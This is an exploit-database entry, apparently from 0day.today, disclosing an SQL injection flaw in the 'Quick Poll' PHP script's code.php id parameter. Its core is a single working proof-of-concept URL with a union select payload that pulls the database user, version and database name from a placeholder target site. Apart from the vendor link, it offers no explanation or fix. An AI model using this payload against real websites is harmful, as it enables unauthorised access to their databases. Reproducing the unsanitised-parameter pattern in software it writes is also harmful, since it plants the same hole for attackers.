id: 10553
date: 12/31/2009
title: Quick Poll (code.php id) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

===========================================================
Quick Poll (code.php id) Remote SQL Injection Vulnerability
===========================================================

|___________________________________________________
|                                                   |
|
| script :http://discountedscripts.com/product_info.php?products_id=69
|
|___________________________________________________|
 
Exploit:
________
 
 
 
www.[target].com/Script/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers--
 



#  0day.today [2023-03-22]  #